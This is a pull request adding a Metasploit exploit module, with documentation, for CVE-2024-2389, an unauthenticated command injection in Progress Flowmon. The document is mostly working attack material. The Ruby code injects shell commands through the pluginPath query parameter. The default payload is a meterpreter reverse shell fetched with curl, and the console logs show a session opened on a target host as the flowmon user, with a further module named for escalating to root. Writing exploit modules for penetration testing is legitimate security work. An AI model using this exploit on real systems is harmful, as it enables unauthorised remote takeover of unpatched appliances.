### PR TITLE
Add module for Flowmon cmd injection CVE-2024-2389

### DIFF
--- a/documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is avaiable in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
+1. Do: `set RHOSTS <target flowmon>`
+1. Do: `set RPORT <port flowmon is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `flowmon` user.
+1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.
+
+## Scenarios
+
+### Flowmon 12.2
+
+``` msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PRIVESC    true             yes       Automatically try privesc to add sudo entry
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to Flowmon
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
+                                                  s
+   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run
+
+[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 172.174.209.101:443 can be exploited!
+[*] Detected version: 12.02.06
+[+] Version 12.02.06 is vulnerable.
+[+] The target is vulnerable.
+[*] Attempting to execute payload...
+[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000
+
+meterpreter > sysinfo
+Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: flowmon
+```

--- a/documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
 
-For more details on the vulnerability:  
+For more details on the vulnerability:
 https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
 
 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
 
-This application is avaiable in cloud marketplaces:
+This application is available in cloud marketplaces:
 - https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
 - https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
 - https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
@@ -25,9 +25,10 @@ This application is avaiable in cloud marketplaces:
 
 ## Scenarios
 
-### Flowmon 12.2
+### Progress Flowmon 12.2
 
-``` msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
+```
+msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
 
 Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
 
@@ -75,8 +76,7 @@ msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 172.174.209.101:443 can be exploited!
 [*] Detected version: 12.02.06
-[+] Version 12.02.06 is vulnerable.
-[+] The target is vulnerable.
+[+] The target is vulnerable. Version 12.02.06 is vulnerable.
 [*] Attempting to execute payload...
 [*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000
 

--- a/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
+++ b/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [['Automatic', {}]],
         'Privileged' => false,
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
           'SSL' => true,
           'RPORT' => 443
         }
@@ -55,8 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
       'method' => 'GET',
       'vars_get' => {
-        'file' => 'x',
-        'lang' => 'x',
+        'file' => rand_text_alphanumeric(8),
+        'lang' => rand_text_alphanumeric(8),
         'pluginPath' => "$(#{cmd})"
       }
     )
@@ -76,27 +75,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET'
     )
 
-    unless res
-      print_error('Connection failed')
-      return CheckCode::Unknown
-    end
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Flowmon Web Interface'
 
     # Use a regular expression to extract the version number from the response
     version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})
 
-    unless version && version[1]
-      print_error('Unable to determine the version from the favicon link.')
-      return CheckCode::Unknown
-    end
+    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]
 
     print_status("Detected version: #{version[1]}")
 
     if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')
-      print_good("Version #{version[1]} is vulnerable.")
-      return CheckCode::Vulnerable
+      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")
     else
-      print_error("Version #{version[1]} is not vulnerable.")
-      return CheckCode::Safe
+      CheckCode::Safe("Version #{version[1]} is not vulnerable.")
     end
   end
 end

--- a/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
+++ b/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Flowmon Unauthenticated Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon
+          versions before v12.03.02.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-2389'],
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
+          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
+        ],
+        'DisclosureDate' => '2024-04-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => false,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'SSL' => true,
+          'RPORT' => 443
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])
+    ])
+  end
+
+  def execute_command(cmd)
+    send_request_cgi(
+      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
+      'method' => 'GET',
+      'vars_get' => {
+        'file' => 'x',
+        'lang' => 'x',
+        'pluginPath' => "$(#{cmd})"
+      }
+    )
+  end
+
+  def exploit
+    print_status('Attempting to execute payload...')
+    execute_command(payload.encoded)
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited!")
+
+    uri = normalize_uri(target_uri.path, 'homepage/auth/login')
+    res = send_request_cgi(
+      'uri' => uri,
+      'method' => 'GET'
+    )
+
+    unless res
+      print_error('Connection failed')
+      return CheckCode::Unknown
+    end
+
+    # Use a regular expression to extract the version number from the response
+    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})
+
+    unless version && version[1]
+      print_error('Unable to determine the version from the favicon link.')
+      return CheckCode::Unknown
+    end
+
+    print_status("Detected version: #{version[1]}")
+
+    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')
+      print_good("Version #{version[1]} is vulnerable.")
+      return CheckCode::Vulnerable
+    else
+      print_error("Version #{version[1]} is not vulnerable.")
+      return CheckCode::Safe
+    end
+  end
+end

--- a/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
+++ b/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     return CheckCode::Unknown('Connection failed') unless res
-    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Flowmon Web Interface'
+    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'
 
     # Use a regular expression to extract the version number from the response
     version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})


### PR DESCRIPTION
This adds a module for:
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection

For more details on the vulnerability:  
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is avaiable in cloud marketplaces:
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud


## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
1. Do: `set RHOSTS <target flowmon>`
1. Do: `set RPORT <port flowmon is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `flowmon` user.
1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.

## Scenarios

### Flowmon 12.2

``` msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options

Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PRIVESC    true             yes       Automatically try privesc to add sudo entry
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to Flowmon
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
                                                  , WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
                                                  s
   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.174.209.101:443 can be exploited!
[*] Detected version: 12.02.06
[+] Version 12.02.06 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: flowmon
```
